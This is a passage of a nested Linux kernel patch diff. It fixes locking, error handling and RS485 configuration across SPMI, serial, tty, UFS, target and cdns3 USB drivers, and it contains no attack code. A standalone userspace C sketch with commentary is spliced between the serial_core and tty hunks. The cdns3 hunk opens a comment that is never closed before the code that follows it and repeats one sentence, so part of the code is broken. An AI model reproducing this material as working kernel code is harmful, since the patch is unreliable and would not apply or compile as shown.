+ 
+ 	/* Check for argument validation. */
+ 	if (sid & ~0xf) {
+@@ -334,6 +336,7 @@ static int pmif_spmi_read_cmd(struct spmi_controller *ctrl, u8 opc, u8 sid,
+ 	else
+ 		return -EINVAL;
+ 
++	raw_spin_lock_irqsave(&arb->lock, flags);
+ 	/* Wait for Software Interface FSM state to be IDLE. */
+ 	inf_reg = &arb->chan;
+ 	ret = readl_poll_timeout_atomic(arb->base + arb->data->regs[inf_reg->ch_sta],
+@@ -343,6 +346,7 @@ static int pmif_spmi_read_cmd(struct spmi_controller *ctrl, u8 opc, u8 sid,
+ 		/* set channel ready if the data has transferred */
+ 		if (pmif_is_fsm_vldclr(arb))
+ 			pmif_writel(arb, 1, inf_reg->ch_rdy);
++		raw_spin_unlock_irqrestore(&arb->lock, flags);
+ 		dev_err(&ctrl->dev, "failed to wait for SWINF_IDLE\n");
+ 		return ret;
+ 	}
+@@ -350,6 +354,7 @@ static int pmif_spmi_read_cmd(struct spmi_controller *ctrl, u8 opc, u8 sid,
+ 	/* Send the command. */
+ 	cmd = (opc << 30) | (sid << 24) | ((len - 1) << 16) | addr;
+ 	pmif_writel(arb, cmd, inf_reg->ch_send);
++	raw_spin_unlock_irqrestore(&arb->lock, flags);
+ 
+ 	/*
+ 	 * Wait for Software Interface FSM state to be WFVLDCLR,
+@@ -376,7 +381,8 @@ static int pmif_spmi_write_cmd(struct spmi_controller *ctrl, u8 opc, u8 sid,
+ 	struct pmif *arb = spmi_controller_get_drvdata(ctrl);
+ 	struct ch_reg *inf_reg;
+ 	int ret;
+-	u32 data, cmd;
++	u32 data, wdata, cmd;
++	unsigned long flags;
+ 
+ 	if (len > 4) {
+ 		dev_err(&ctrl->dev, "pmif supports 1..4 bytes per trans, but:%zu requested", len);
+@@ -394,6 +400,10 @@ static int pmif_spmi_write_cmd(struct spmi_controller *ctrl, u8 opc, u8 sid,
+ 	else
+ 		return -EINVAL;
+ 
++	/* Set the write data. */
++	memcpy(&wdata, buf, len);
++
++	raw_spin_lock_irqsave(&arb->lock, flags);
+ 	/* Wait for Software Interface FSM state to be IDLE. */
+ 	inf_reg = &arb->chan;
+ 	ret = readl_poll_timeout_atomic(arb->base + arb->data->regs[inf_reg->ch_sta],
+@@ -403,17 +413,17 @@ static int pmif_spmi_write_cmd(struct spmi_controller *ctrl, u8 opc, u8 sid,
+ 		/* set channel ready if the data has transferred */
+ 		if (pmif_is_fsm_vldclr(arb))
+ 			pmif_writel(arb, 1, inf_reg->ch_rdy);
++		raw_spin_unlock_irqrestore(&arb->lock, flags);
+ 		dev_err(&ctrl->dev, "failed to wait for SWINF_IDLE\n");
+ 		return ret;
+ 	}
+ 
+-	/* Set the write data. */
+-	memcpy(&data, buf, len);
+-	pmif_writel(arb, data, inf_reg->wdata);
++	pmif_writel(arb, wdata, inf_reg->wdata);
+ 
+ 	/* Send the command. */
+ 	cmd = (opc << 30) | BIT(29) | (sid << 24) | ((len - 1) << 16) | addr;
+ 	pmif_writel(arb, cmd, inf_reg->ch_send);
++	raw_spin_unlock_irqrestore(&arb->lock, flags);
+ 
+ 	return 0;
+ }
+@@ -488,6 +498,8 @@ static int mtk_spmi_probe(struct platform_device *pdev)
+ 	arb->chan.ch_send = PMIF_SWINF_0_ACC + chan_offset;
+ 	arb->chan.ch_rdy = PMIF_SWINF_0_VLD_CLR + chan_offset;
+ 
++	raw_spin_lock_init(&arb->lock);
++
+ 	platform_set_drvdata(pdev, ctrl);
+ 
+ 	err = spmi_controller_add(ctrl);
+diff --git a/drivers/staging/media/rkvdec/rkvdec.c b/drivers/staging/media/rkvdec/rkvdec.c
+index a9bd1e71ea487..d16cf4115d03a 100644
+--- a/drivers/staging/media/rkvdec/rkvdec.c
++++ b/drivers/staging/media/rkvdec/rkvdec.c
+@@ -461,6 +461,9 @@ static const struct v4l2_ioctl_ops rkvdec_ioctl_ops = {
+ 
+ 	.vidioc_streamon = v4l2_m2m_ioctl_streamon,
+ 	.vidioc_streamoff = v4l2_m2m_ioctl_streamoff,
++
++	.vidioc_decoder_cmd = v4l2_m2m_ioctl_stateless_decoder_cmd,
++	.vidioc_try_decoder_cmd = v4l2_m2m_ioctl_stateless_try_decoder_cmd,
+ };
+ 
+ static int rkvdec_queue_setup(struct vb2_queue *vq, unsigned int *num_buffers,
+diff --git a/drivers/target/target_core_file.c b/drivers/target/target_core_file.c
+index 7e81a53dbf3ca..8d74e97c98748 100644
+--- a/drivers/target/target_core_file.c
++++ b/drivers/target/target_core_file.c
+@@ -338,11 +338,13 @@ static int fd_do_rw(struct se_cmd *cmd, struct file *fd,
+ 	}
+ 
+ 	iov_iter_bvec(&iter, is_write, bvec, sgl_nents, len);
+-	if (is_write)
++	if (is_write) {
++		file_start_write(fd);
+ 		ret = vfs_iter_write(fd, &iter, &pos, 0);
+-	else
++		file_end_write(fd);
++	} else {
+ 		ret = vfs_iter_read(fd, &iter, &pos, 0);
+-
++	}
+ 	if (is_write) {
+ 		if (ret < 0 || ret != data_length) {
+ 			pr_err("%s() write returned %d\n", __func__, ret);
+@@ -474,7 +476,9 @@ fd_execute_write_same(struct se_cmd *cmd)
+ 	}
+ 
+ 	iov_iter_bvec(&iter, ITER_SOURCE, bvec, nolb, len);
++	file_start_write(fd_dev->fd_file);
+ 	ret = vfs_iter_write(fd_dev->fd_file, &iter, &pos, 0);
++	file_end_write(fd_dev->fd_file);
+ 
+ 	kfree(bvec);
+ 	if (ret < 0 || ret != len) {
+diff --git a/drivers/tty/serial/8250/8250_bcm2835aux.c b/drivers/tty/serial/8250/8250_bcm2835aux.c
+index 15a2387a5b258..4f4502fb5454c 100644
+--- a/drivers/tty/serial/8250/8250_bcm2835aux.c
++++ b/drivers/tty/serial/8250/8250_bcm2835aux.c
+@@ -119,6 +119,8 @@ static int bcm2835aux_serial_probe(struct platform_device *pdev)
+ 
+ 	/* get the clock - this also enables the HW */
+ 	data->clk = devm_clk_get_optional(&pdev->dev, NULL);
++	if (IS_ERR(data->clk))
++		return dev_err_probe(&pdev->dev, PTR_ERR(data->clk), "could not get clk\n");
+ 
+ 	/* get the interrupt */
+ 	ret = platform_get_irq(pdev, 0);
+diff --git a/drivers/tty/serial/8250/8250_exar.c b/drivers/tty/serial/8250/8250_exar.c
+index b406cba10b0eb..dca1abe363248 100644
+--- a/drivers/tty/serial/8250/8250_exar.c
++++ b/drivers/tty/serial/8250/8250_exar.c
+@@ -442,7 +442,7 @@ static int generic_rs485_config(struct uart_port *port, struct ktermios *termios
+ }
+ 
+ static const struct serial_rs485 generic_rs485_supported = {
+-	.flags = SER_RS485_ENABLED,
++	.flags = SER_RS485_ENABLED | SER_RS485_RTS_ON_SEND,
+ };
+ 
+ static const struct exar8250_platform exar8250_default_platform = {
+@@ -486,7 +486,8 @@ static int iot2040_rs485_config(struct uart_port *port, struct ktermios *termios
+ }
+ 
+ static const struct serial_rs485 iot2040_rs485_supported = {
+-	.flags = SER_RS485_ENABLED | SER_RS485_RX_DURING_TX | SER_RS485_TERMINATE_BUS,
++	.flags = SER_RS485_ENABLED | SER_RS485_RTS_ON_SEND |
++		 SER_RS485_RX_DURING_TX | SER_RS485_TERMINATE_BUS,
+ };
+ 
+ static const struct property_entry iot2040_gpio_properties[] = {
+diff --git a/drivers/tty/serial/8250/8250_omap.c b/drivers/tty/serial/8250/8250_omap.c
+index 0b04d810b3e61..037d613006f56 100644
+--- a/drivers/tty/serial/8250/8250_omap.c
++++ b/drivers/tty/serial/8250/8250_omap.c
+@@ -1476,7 +1476,7 @@ static int omap8250_remove(struct platform_device *pdev)
+ 
+ 	err = pm_runtime_resume_and_get(&pdev->dev);
+ 	if (err)
+-		return err;
++		dev_err(&pdev->dev, "Failed to resume hardware\n");
+ 
+ 	serial8250_unregister_port(priv->line);
+ 	priv->line = -ENODEV;
+diff --git a/drivers/tty/serial/imx.c b/drivers/tty/serial/imx.c
+index d2137f6eff327..f8962a3d44216 100644
+--- a/drivers/tty/serial/imx.c
++++ b/drivers/tty/serial/imx.c
+@@ -450,13 +450,13 @@ static void imx_uart_stop_tx(struct uart_port *port)
+ 	ucr1 = imx_uart_readl(sport, UCR1);
+ 	imx_uart_writel(sport, ucr1 & ~UCR1_TRDYEN, UCR1);
+ 
++	ucr4 = imx_uart_readl(sport, UCR4);
+ 	usr2 = imx_uart_readl(sport, USR2);
+-	if (!(usr2 & USR2_TXDC)) {
++	if ((!(usr2 & USR2_TXDC)) && (ucr4 & UCR4_TCEN)) {
+ 		/* The shifter is still busy, so retry once TC triggers */
+ 		return;
+ 	}
+ 
+-	ucr4 = imx_uart_readl(sport, UCR4);
+ 	ucr4 &= ~UCR4_TCEN;
+ 	imx_uart_writel(sport, ucr4, UCR4);
+ 
+@@ -2229,7 +2229,6 @@ static enum hrtimer_restart imx_trigger_stop_tx(struct hrtimer *t)
+ 	return HRTIMER_NORESTART;
+ }
+ 
+-static const struct serial_rs485 imx_no_rs485 = {};	/* No RS485 if no RTS */
+ static const struct serial_rs485 imx_rs485_supported = {
+ 	.flags = SER_RS485_ENABLED | SER_RS485_RTS_ON_SEND | SER_RS485_RTS_AFTER_SEND |
+ 		 SER_RS485_RX_DURING_TX,
+@@ -2319,8 +2318,6 @@ static int imx_uart_probe(struct platform_device *pdev)
+ 	/* RTS is required to control the RS485 transmitter */
+ 	if (sport->have_rtscts || sport->have_rtsgpio)
+ 		sport->port.rs485_supported = imx_rs485_supported;
+-	else
+-		sport->port.rs485_supported = imx_no_rs485;
+ 	sport->port.flags = UPF_BOOT_AUTOCONF;
+ 	timer_setup(&sport->timer, imx_uart_timeout, 0);
+ 
+@@ -2347,7 +2344,7 @@ static int imx_uart_probe(struct platform_device *pdev)
+ 	/* For register access, we only need to enable the ipg clock. */
+ 	ret = clk_prepare_enable(sport->clk_ipg);
+ 	if (ret) {
+-		dev_err(&pdev->dev, "failed to enable per clk: %d\n", ret);
++		dev_err(&pdev->dev, "failed to enable ipg clk: %d\n", ret);
+ 		return ret;
+ 	}
+ 
+@@ -2359,14 +2356,8 @@ static int imx_uart_probe(struct platform_device *pdev)
+ 	sport->ufcr = readl(sport->port.membase + UFCR);
+ 
+ 	ret = uart_get_rs485_mode(&sport->port);
+-	if (ret) {
+-		clk_disable_unprepare(sport->clk_ipg);
+-		return ret;
+-	}
+-
+-	if (sport->port.rs485.flags & SER_RS485_ENABLED &&
+-	    (!sport->have_rtscts && !sport->have_rtsgpio))
+-		dev_err(&pdev->dev, "no RTS control, disabling rs485\n");
++	if (ret)
++		goto err_clk;
+ 
+ 	/*
+ 	 * If using the i.MX UART RTS/CTS control then the RTS (CTS_B)
+@@ -2446,8 +2437,6 @@ static int imx_uart_probe(struct platform_device *pdev)
+ 		imx_uart_writel(sport, ucr3, UCR3);
+ 	}
+ 
+-	clk_disable_unprepare(sport->clk_ipg);
+-
+ 	hrtimer_init(&sport->trigger_start_tx, CLOCK_MONOTONIC, HRTIMER_MODE_REL);
+ 	hrtimer_init(&sport->trigger_stop_tx, CLOCK_MONOTONIC, HRTIMER_MODE_REL);
+ 	sport->trigger_start_tx.function = imx_trigger_start_tx;
+@@ -2463,7 +2452,7 @@ static int imx_uart_probe(struct platform_device *pdev)
+ 		if (ret) {
+ 			dev_err(&pdev->dev, "failed to request rx irq: %d\n",
+ 				ret);
+-			return ret;
++			goto err_clk;
+ 		}
+ 
+ 		ret = devm_request_irq(&pdev->dev, txirq, imx_uart_txint, 0,
+@@ -2471,7 +2460,7 @@ static int imx_uart_probe(struct platform_device *pdev)
+ 		if (ret) {
+ 			dev_err(&pdev->dev, "failed to request tx irq: %d\n",
+ 				ret);
+-			return ret;
++			goto err_clk;
+ 		}
+ 
+ 		ret = devm_request_irq(&pdev->dev, rtsirq, imx_uart_rtsint, 0,
+@@ -2479,14 +2468,14 @@ static int imx_uart_probe(struct platform_device *pdev)
+ 		if (ret) {
+ 			dev_err(&pdev->dev, "failed to request rts irq: %d\n",
+ 				ret);
+-			return ret;
++			goto err_clk;
+ 		}
+ 	} else {
+ 		ret = devm_request_irq(&pdev->dev, rxirq, imx_uart_int, 0,
+ 				       dev_name(&pdev->dev), sport);
+ 		if (ret) {
+ 			dev_err(&pdev->dev, "failed to request irq: %d\n", ret);
+-			return ret;
++			goto err_clk;
+ 		}
+ 	}
+ 
+@@ -2494,7 +2483,12 @@ static int imx_uart_probe(struct platform_device *pdev)
+ 
+ 	platform_set_drvdata(pdev, sport);
+ 
+-	return uart_add_one_port(&imx_uart_uart_driver, &sport->port);
++	ret = uart_add_one_port(&imx_uart_uart_driver, &sport->port);
++
++err_clk:
++	clk_disable_unprepare(sport->clk_ipg);
++
++	return ret;
+ }
+ 
+ static int imx_uart_remove(struct platform_device *pdev)
+diff --git a/drivers/tty/serial/omap-serial.c b/drivers/tty/serial/omap-serial.c
+index 7d0d2718ef595..beb7896ebf8ae 100644
+--- a/drivers/tty/serial/omap-serial.c
++++ b/drivers/tty/serial/omap-serial.c
+@@ -1512,6 +1512,13 @@ static struct omap_uart_port_info *of_get_uart_port_info(struct device *dev)
+ 	return omap_up_info;
+ }
+ 
++static const struct serial_rs485 serial_omap_rs485_supported = {
++	.flags = SER_RS485_ENABLED | SER_RS485_RTS_ON_SEND | SER_RS485_RTS_AFTER_SEND |
++		 SER_RS485_RX_DURING_TX,
++	.delay_rts_before_send = 1,
++	.delay_rts_after_send = 1,
++};
++
+ static int serial_omap_probe_rs485(struct uart_omap_port *up,
+ 				   struct device *dev)
+ {
+@@ -1526,6 +1533,9 @@ static int serial_omap_probe_rs485(struct uart_omap_port *up,
+ 	if (!np)
+ 		return 0;
+ 
++	up->port.rs485_config = serial_omap_config_rs485;
++	up->port.rs485_supported = serial_omap_rs485_supported;
++
+ 	ret = uart_get_rs485_mode(&up->port);
+ 	if (ret)
+ 		return ret;
+@@ -1560,13 +1570,6 @@ static int serial_omap_probe_rs485(struct uart_omap_port *up,
+ 	return 0;
+ }
+ 
+-static const struct serial_rs485 serial_omap_rs485_supported = {
+-	.flags = SER_RS485_ENABLED | SER_RS485_RTS_ON_SEND | SER_RS485_RTS_AFTER_SEND |
+-		 SER_RS485_RX_DURING_TX,
+-	.delay_rts_before_send = 1,
+-	.delay_rts_after_send = 1,
+-};
+-
+ static int serial_omap_probe(struct platform_device *pdev)
+ {
+ 	struct omap_uart_port_info *omap_up_info = dev_get_platdata(&pdev->dev);
+@@ -1634,17 +1637,11 @@ static int serial_omap_probe(struct platform_device *pdev)
+ 		dev_info(up->port.dev, "no wakeirq for uart%d\n",
+ 			 up->port.line);
+ 
+-	ret = serial_omap_probe_rs485(up, &pdev->dev);
+-	if (ret < 0)
+-		goto err_rs485;
+-
+ 	sprintf(up->name, "OMAP UART%d", up->port.line);
+ 	up->port.mapbase = mem->start;
+ 	up->port.membase = base;
+ 	up->port.flags = omap_up_info->flags;
+ 	up->port.uartclk = omap_up_info->uartclk;
+-	up->port.rs485_config = serial_omap_config_rs485;
+-	up->port.rs485_supported = serial_omap_rs485_supported;
+ 	if (!up->port.uartclk) {
+ 		up->port.uartclk = DEFAULT_CLK_SPEED;
+ 		dev_warn(&pdev->dev,
+@@ -1652,6 +1649,10 @@ static int serial_omap_probe(struct platform_device *pdev)
+ 			 DEFAULT_CLK_SPEED);
+ 	}
+ 
++	ret = serial_omap_probe_rs485(up, &pdev->dev);
++	if (ret < 0)
++		goto err_rs485;
++
+ 	up->latency = PM_QOS_CPU_LATENCY_DEFAULT_VALUE;
+ 	up->calc_latency = PM_QOS_CPU_LATENCY_DEFAULT_VALUE;
+ 	cpu_latency_qos_add_request(&up->pm_qos_request, up->latency);
+diff --git a/drivers/tty/serial/sc16is7xx.c b/drivers/tty/serial/sc16is7xx.c
+index b4b849415c503..db33790e66754 100644
+--- a/drivers/tty/serial/sc16is7xx.c
++++ b/drivers/tty/serial/sc16is7xx.c
+@@ -24,6 +24,7 @@
+ #include <linux/tty_flip.h>
+ #include <linux/spi/spi.h>
+ #include <linux/uaccess.h>
++#include <linux/units.h>
+ #include <uapi/linux/sched/types.h>
+ 
+ #define SC16IS7XX_NAME			"sc16is7xx"
+@@ -1716,9 +1717,12 @@ static int sc16is7xx_spi_probe(struct spi_device *spi)
+ 
+ 	/* Setup SPI bus */
+ 	spi->bits_per_word	= 8;
+-	/* only supports mode 0 on SC16IS762 */
++	/* For all variants, only mode 0 is supported */
++	if ((spi->mode & SPI_MODE_X_MASK) != SPI_MODE_0)
++		return dev_err_probe(&spi->dev, -EINVAL, "Unsupported SPI mode\n");
++
+ 	spi->mode		= spi->mode ? : SPI_MODE_0;
+-	spi->max_speed_hz	= spi->max_speed_hz ? : 15000000;
++	spi->max_speed_hz	= spi->max_speed_hz ? : 4 * HZ_PER_MHZ;
+ 	ret = spi_setup(spi);
+ 	if (ret)
+ 		return ret;
+diff --git a/drivers/tty/serial/serial_core.c b/drivers/tty/serial/serial_core.c
+index d4e57f9017db9..f0ed30d0a697c 100644
+--- a/drivers/tty/serial/serial_core.c
++++ b/drivers/tty/serial/serial_core.c
+@@ -1353,19 +1353,27 @@ static void uart_sanitize_serial_rs485(struct uart_port *port, struct serial_rs4
+ 		return;
+ 	}
+ 
++	rs485->flags &= supported_flags;
++
+ 	/* Pick sane settings if the user hasn't */
+-	if ((supported_flags & (SER_RS485_RTS_ON_SEND|SER_RS485_RTS_AFTER_SEND)) &&
+-	    !(rs485->flags & SER_RS485_RTS_ON_SEND) ==
++	if (!(rs485->flags & SER_RS485_RTS_ON_SEND) ==
+ 	    !(rs485->flags & SER_RS485_RTS_AFTER_SEND)) {
+-		dev_warn_ratelimited(port->dev,
+-			"%s (%d): invalid RTS setting, using RTS_ON_SEND instead\n",
+-			port->name, port->line);
+-		rs485->flags |= SER_RS485_RTS_ON_SEND;
+-		rs485->flags &= ~SER_RS485_RTS_AFTER_SEND;
+-		supported_flags |= SER_RS485_RTS_ON_SEND|SER_RS485_RTS_AFTER_SEND;
+-	}
++		if (supported_flags & SER_RS485_RTS_ON_SEND) {
++			rs485->flags |= SER_RS485_RTS_ON_SEND;
++			rs485->flags &= ~SER_RS485_RTS_AFTER_SEND;
+ 
+-	rs485->flags &= supported_flags;
++			dev_warn_ratelimited(port->dev,
++				"%s (%d): invalid RTS setting, using RTS_ON_SEND instead\n",
++				port->name, port->line);
++		} else {
++			rs485->flags |= SER_RS485_RTS_AFTER_SEND;
++			rs485->flags &= ~SER_RS485_RTS_ON_SEND;
++
++			dev_warn_ratelimited(port->dev,
++				"%s (%d): invalid RTS setting, using RTS_AFTER_SEND instead\n",
++				port->name, port->line);
++		}
++	}
+ 
+ 	uart_sanitize_serial_rs485_delays(port, rs485);
+ 
+@@ -1428,7 +1436,7 @@ static int uart_set_rs485_config(struct tty_struct *tty, struct uart_port *port,
+ 	int ret;
+ 	unsigned long flags;
+ 
+-	if (!port->rs485_config)
++	if (!(port->rs485_supported.flags & SER_RS485_ENABLED))
+ 		return -ENOTTY;
+ 
+ 	if (copy_from_user(&rs485, rs485_user, sizeof(*rs485_user)))
+@@ -3420,6 +3428,9 @@ int uart_get_rs485_mode(struct uart_port *port)
+ 	u32 rs485_delay[2];
+ 	int ret;
+ 
++	if (!(port->rs485_supported.flags & SER_RS485_ENABLED))
++		return 0;
++
+ 	ret = device_property_read_u32_array(dev, "rs485-rts-delay",
+ 					     rs485_delay, 2);
+ 	if (!ret) {
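
The reordered logic in uart_sanitize_serial_rs485() above is easiest to see in isolation: unsupported flags are masked first, and the fallback then picks whichever RTS polarity the port actually supports. A hedged userspace sketch, with flag values assumed to mirror include/uapi/linux/serial.h:

#include <stdint.h>
#include <stdio.h>

#define SER_RS485_ENABLED        (1u << 0)
#define SER_RS485_RTS_ON_SEND    (1u << 1)
#define SER_RS485_RTS_AFTER_SEND (1u << 2)

static uint32_t sanitize_rts(uint32_t flags, uint32_t supported)
{
	/* Drop anything the port cannot do before inspecting RTS bits */
	flags &= supported;

	/* Exactly one RTS polarity must remain set */
	if (!(flags & SER_RS485_RTS_ON_SEND) ==
	    !(flags & SER_RS485_RTS_AFTER_SEND)) {
		if (supported & SER_RS485_RTS_ON_SEND) {
			flags |= SER_RS485_RTS_ON_SEND;
			flags &= ~SER_RS485_RTS_AFTER_SEND;
		} else {
			flags |= SER_RS485_RTS_AFTER_SEND;
			flags &= ~SER_RS485_RTS_ON_SEND;
		}
	}
	return flags;
}

int main(void)
{
	/* User asks for RTS_ON_SEND on a port that only supports AFTER_SEND */
	uint32_t in = SER_RS485_ENABLED | SER_RS485_RTS_ON_SEND;
	uint32_t sup = SER_RS485_ENABLED | SER_RS485_RTS_AFTER_SEND;

	printf("0x%x\n", sanitize_rts(in, sup));	/* 0x5: ENABLED | AFTER_SEND */
	return 0;
}

Masking first is the point of the reorder: the fallback now reflects what the hardware can do instead of unconditionally forcing RTS_ON_SEND.
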
+diff --git a/drivers/tty/tty.h b/drivers/tty/tty.h
+index c5ee219127555..91515e1ebc8d3 100644
+--- a/drivers/tty/tty.h
++++ b/drivers/tty/tty.h
+@@ -63,7 +63,7 @@ int tty_check_change(struct tty_struct *tty);
+ void __stop_tty(struct tty_struct *tty);
+ void __start_tty(struct tty_struct *tty);
+ void tty_write_unlock(struct tty_struct *tty);
+-int tty_write_lock(struct tty_struct *tty, int ndelay);
++int tty_write_lock(struct tty_struct *tty, bool ndelay);
+ void tty_vhangup_session(struct tty_struct *tty);
+ void tty_open_proc_set_tty(struct file *filp, struct tty_struct *tty);
+ int tty_signal_session_leader(struct tty_struct *tty, int exit_session);
+diff --git a/drivers/tty/tty_io.c b/drivers/tty/tty_io.c
+index 8fb6c6853556a..aaf77a5616ff1 100644
+--- a/drivers/tty/tty_io.c
++++ b/drivers/tty/tty_io.c
+@@ -939,7 +939,7 @@ void tty_write_unlock(struct tty_struct *tty)
+ 	wake_up_interruptible_poll(&tty->write_wait, EPOLLOUT);
+ }
+ 
+-int tty_write_lock(struct tty_struct *tty, int ndelay)
++int tty_write_lock(struct tty_struct *tty, bool ndelay)
+ {
+ 	if (!mutex_trylock(&tty->atomic_write_lock)) {
+ 		if (ndelay)
+@@ -1153,7 +1153,7 @@ int tty_send_xchar(struct tty_struct *tty, char ch)
+ 		return 0;
+ 	}
+ 
+-	if (tty_write_lock(tty, 0) < 0)
++	if (tty_write_lock(tty, false) < 0)
+ 		return -ERESTARTSYS;
+ 
+ 	down_read(&tty->termios_rwsem);
+@@ -2472,22 +2472,25 @@ static int send_break(struct tty_struct *tty, unsigned int duration)
+ 		return 0;
+ 
+ 	if (tty->driver->flags & TTY_DRIVER_HARDWARE_BREAK)
+-		retval = tty->ops->break_ctl(tty, duration);
+-	else {
+-		/* Do the work ourselves */
+-		if (tty_write_lock(tty, 0) < 0)
+-			return -EINTR;
+-		retval = tty->ops->break_ctl(tty, -1);
+-		if (retval)
+-			goto out;
+-		if (!signal_pending(current))
+-			msleep_interruptible(duration);
++		return tty->ops->break_ctl(tty, duration);
++
++	/* Do the work ourselves */
++	if (tty_write_lock(tty, false) < 0)
++		return -EINTR;
++
++	retval = tty->ops->break_ctl(tty, -1);
++	if (!retval) {
++		msleep_interruptible(duration);
+ 		retval = tty->ops->break_ctl(tty, 0);
+-out:
+-		tty_write_unlock(tty);
+-		if (signal_pending(current))
+-			retval = -EINTR;
++	} else if (retval == -EOPNOTSUPP) {
++		/* some drivers can tell only dynamically */
++		retval = 0;
+ 	}
++	tty_write_unlock(tty);
++
++	if (signal_pending(current))
++		retval = -EINTR;
++
+ 	return retval;
+ }
+ 
+diff --git a/drivers/tty/tty_ioctl.c b/drivers/tty/tty_ioctl.c
+index ad1cf51ecd11d..8767c504b95dd 100644
+--- a/drivers/tty/tty_ioctl.c
++++ b/drivers/tty/tty_ioctl.c
+@@ -506,7 +506,7 @@ retry_write_wait:
+ 		if (retval < 0)
+ 			return retval;
+ 
+-		if (tty_write_lock(tty, 0) < 0)
++		if (tty_write_lock(tty, false) < 0)
+ 			goto retry_write_wait;
+ 
+ 		/* Racing writer? */
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index dc38d1fa77874..474e94a69b185 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -8204,7 +8204,6 @@ static int ufshcd_add_lus(struct ufs_hba *hba)
+ 	ufs_bsg_probe(hba);
+ 	ufshpb_init(hba);
+ 	scsi_scan_host(hba->host);
+-	pm_runtime_put_sync(hba->dev);
+ 
+ out:
+ 	return ret;
+@@ -8331,15 +8330,15 @@ static void ufshcd_async_scan(void *data, async_cookie_t cookie)
+ 
+ 	/* Probe and add UFS logical units  */
+ 	ret = ufshcd_add_lus(hba);
++
+ out:
++	pm_runtime_put_sync(hba->dev);
+ 	/*
+ 	 * If we failed to initialize the device or the device is not
+ 	 * present, turn off the power/clocks etc.
+ 	 */
+-	if (ret) {
+-		pm_runtime_put_sync(hba->dev);
++	if (ret)
+ 		ufshcd_hba_exit(hba);
+-	}
+ }
+ 
+ static const struct attribute_group *ufshcd_driver_groups[] = {
+diff --git a/drivers/usb/cdns3/cdns3-gadget.c b/drivers/usb/cdns3/cdns3-gadget.c
+index 69a44bd7e5d02..ccdd525bd7c80 100644
+--- a/drivers/usb/cdns3/cdns3-gadget.c
++++ b/drivers/usb/cdns3/cdns3-gadget.c
+@@ -1117,6 +1117,8 @@ static int cdns3_ep_run_transfer(struct cdns3_endpoint *priv_ep,
+ 	dma_addr_t trb_dma;
+ 	u32 togle_pcs = 1;
+ 	int sg_iter = 0;
++	int num_trb_req;
++	int trb_burst;
+ 	int num_trb;
+ 	int address;
+ 	u32 control;
+@@ -1125,15 +1127,13 @@ static int cdns3_ep_run_transfer(struct cdns3_endpoint *priv_ep,
+ 	struct scatterlist *s = NULL;
+ 	bool sg_supported = !!(request->num_mapped_sgs);
+ 
++	num_trb_req = sg_supported ? request->num_mapped_sgs : 1;
++
++	/* ISO transfers require a TD for each SOF; each TD includes some TRBs */
+ 	if (priv_ep->type == USB_ENDPOINT_XFER_ISOC)
+-		num_trb = priv_ep->interval;
++		num_trb = priv_ep->interval * num_trb_req;
+ 	else
+-		num_trb = sg_supported ? request->num_mapped_sgs : 1;
+-
+-	if (num_trb > priv_ep->free_trbs) {
+-		priv_ep->flags |= EP_RING_FULL;
+-		return -ENOBUFS;
+-	}
++		num_trb = num_trb_req;
+ 
+ 	priv_req = to_cdns3_request(request);
+ 	address = priv_ep->endpoint.desc->bEndpointAddress;
+@@ -1182,14 +1182,31 @@ static int cdns3_ep_run_transfer(struct cdns3_endpoint *priv_ep,
+ 
+ 		link_trb->control = cpu_to_le32(((priv_ep->pcs) ? TRB_CYCLE : 0) |
+ 				    TRB_TYPE(TRB_LINK) | TRB_TOGGLE | ch_bit);
++
++		if (priv_ep->type == USB_ENDPOINT_XFER_ISOC) {
++			/*
++			 * ISO require LINK TRB must be first one of TD.
++			 * ISO requires the LINK TRB to be the first one of a TD.
++			 * Fill the remaining TRB space with LINK TRBs to simplify
++			 * the software processing logic.
++			while (priv_ep->enqueue) {
++				*trb = *link_trb;
++				trace_cdns3_prepare_trb(priv_ep, trb);
++
++				cdns3_ep_inc_enq(priv_ep);
++				trb = priv_ep->trb_pool + priv_ep->enqueue;
++				priv_req->trb = trb;
++			}
++		}
++	}
++
++	if (num_trb > priv_ep->free_trbs) {
++		priv_ep->flags |= EP_RING_FULL;
++		return -ENOBUFS;
+ 	}
+ 
+ 	if (priv_dev->dev_ver <= DEV_VER_V2)
+ 		togle_pcs = cdns3_wa1_update_guard(priv_ep, trb);
+ 
+-	if (sg_supported)
+-		s = request->sg;
+-
+ 	/* set incorrect Cycle Bit for first trb*/
+ 	control = priv_ep->pcs ? 0 : TRB_CYCLE;
+ 	trb->length = 0;
+@@ -1207,6 +1224,9 @@ static int cdns3_ep_run_transfer(struct cdns3_endpoint *priv_ep,
+ 	do {
+ 		u32 length;
+ 
++		if (!(sg_iter % num_trb_req) && sg_supported)
++			s = request->sg;
++
+ 		/* fill TRB */
+ 		control |= TRB_TYPE(TRB_NORMAL);
+ 		if (sg_supported) {
+@@ -1221,7 +1241,36 @@ static int cdns3_ep_run_transfer(struct cdns3_endpoint *priv_ep,
+ 			total_tdl += DIV_ROUND_UP(length,
+ 					       priv_ep->endpoint.maxpacket);
+ 
+-		trb->length |= cpu_to_le32(TRB_BURST_LEN(priv_ep->trb_burst_size) |
++		trb_burst = priv_ep->trb_burst_size;
++
++		/*
++		 * The DMA cross-4 KiB-boundary problem was supposed to be fixed in
++		 * DEV_VER_V2, but ISO transfers still hit it when scatter-gather is
++		 * enabled.
++		 *
++		 * With sg enabled, a package size of 1k and a mult of 2, the data
++		 * pattern looks like:
++		 *       [UVC Header(8B) ] [data(3k - 8)] ...
++		 *
++		 * The receive at offset 0xd000 instead gets the 0xc000 data with
++		 * length 0x70. The errors follow this pattern:
++		 *	0xd000: wrong
++		 *	0xe000: wrong
++		 *	0xf000: correct
++		 *	0x10000: wrong
++		 *	0x11000: wrong
++		 *	0x12000: correct
++		 *	...
++		 *
++		 * It is still unclear why no error occurs below 0xd000, which should
++		 * also cross a 4 KiB boundary, but the code below does fix the problem.
++		 *
++		 * To avoid DMA crossing a 4 KiB boundary during ISO transfers, reduce
++		 * the burst length to 16.
++		 */
++		if (priv_ep->type == USB_ENDPOINT_XFER_ISOC && priv_dev->dev_ver <= DEV_VER_V2)
++			if (ALIGN_DOWN(trb->buffer, SZ_4K) !=
++			    ALIGN_DOWN(trb->buffer + length, SZ_4K))
++				trb_burst = 16;
++
++		trb->length |= cpu_to_le32(TRB_BURST_LEN(trb_burst) |
+ 					TRB_LEN(length));
+ 		pcs = priv_ep->pcs ? TRB_CYCLE : 0;
+ 
